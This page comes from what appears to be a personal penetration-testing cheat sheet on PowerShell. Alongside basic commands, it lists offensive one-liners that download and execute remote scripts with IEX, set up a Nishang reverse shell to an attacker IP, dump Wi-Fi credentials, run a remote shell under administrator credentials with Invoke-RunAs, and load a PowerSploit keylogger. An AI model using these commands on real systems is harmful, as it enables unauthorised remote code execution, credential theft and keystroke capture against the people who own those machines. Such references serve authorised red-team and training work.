d4Rk's 1337 h4x0r guide
About me
Search…
Introduction
Reconnaissance
Recon
OSINT
Enumeration
Network discovery
Port scanning
Webserver scanning
Exploit detection
Fuzzing
Process monitoring
Exploitation
Shells
Passwords
Web
Buffer overflow
Misc
Privilege escalation
Linux
Windows
Post exploitation
Loot
Pivoting
Standalone Tools
Services
TCP
UDP
Misc
File transfer
Overview
Wget
Pure-FTPd
TFTP
VBScript: Wget clone
Misc
Bash
Burp Suite
Crypto
Ebowla
Firefox extensions
Impacket
Memory forensics
Metasploit Framework (MSF)
MITM
Msfvenom
Pass the Hash (PTH)
PowerShell
PowerShell on Linux
Wireshark
Wordlists and dictionaries
Bug Bounty
Platforms
Tools
Powered By GitBook
PowerShell

Basic commands

Help
1
Get-Help <command> -Detailed
Copied!
Display all properties
1
<command> | Select-Object -Property *
2
<command> | Select *
Copied!
Get file contents (like type or cat which is actually available as an alias, I guess)
1
Get-Content <file>
Copied!
Delete directory recursive
1
Remove-Item -Recurse -Force <dir>
Copied!
Write output to file
1
<command> | Out-File <file>
Copied!
Count
1
(<command>).Count
Copied!
Measures (Count, Avg, etc.)
1
<command> | Measure-Object
Copied!
Whoami
1
whoami /all
Copied!
-> SeImpersonatePrivilege (Potato exploits, PrintSpoofer, etc.)

Download file

1
IEX(New-Object Net.WebClient).downloadString('<url>')`
Copied!
or
1
IEX(IWR('<url>'))
Copied!

Check architecture

1
[environment]::Is64BitOperatingSystem
2
[environment]::Is64BitProcess
Copied!
64bit PowerShell path
1
C:\Windows\SysNative\WindowsPowerShell\v1.0\PowerShell
Copied!

Base64 encode file

1
$fc = Get-Content "filename"
2
$fe = [System.Text.Encoding]::UTF8.GetBytes($fc)
3
[System.Convert]::ToBase64String($fe)
Copied!

Nishang

Offensive PowerShell for red team, penetration testing and offensive security. GitHub - samratashok/nishang​
Gather information
1
powershell -ExecutionPolicy bypass -file Get-Information.ps1 > results.txt
Copied!
Get wifi creds
1
.\Get-WLAN-Keys.ps1
Copied!
Reverse shell
1
/usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1
Copied!
-> Append Invoke-PowerShellTcp -Reverse -IPAddress <ip> -Port <port> to Invoke-PowerShellTcp.ps1 to automatically execute the shell
Remote execution
1
powershell IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1')
Copied!
1
powershell -NoProfile -ExecutionPolicy unrestricted -Command IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1')
Copied!

PowerShell-Suite

This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind. GitHub - FuzzySecurity/PowerShell-Suite​
1
Invoke-RunAs.ps1
Copied!
1
Invoke-RunAs -User Administrator -Password <pw> -LogonType 0x1 -Binary c:\Windows\SysNative\WindowsPowerShell\v1.0\PowerShell.exe -Args "IEX(New-Object Net.WebClient).downloadString('http://<ip>/shell.ps1')"
Copied!
-> Put at the bottom of Invoke-RunAs.ps1, if not working otherwise

Keylogger

1
IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1)
2
Get-Keystrokes -LogPath C:\key.log -CollectionInterval 1
Copied!
Misc - Previous
Pass the Hash (PTH)
Next - Misc
PowerShell on Linux
Last modified 4mo ago
Copy link
Edit on GitHub
Contents
Basic commands
Download file
Check architecture
Base64 encode file
Nishang
PowerShell-Suite
Keylogger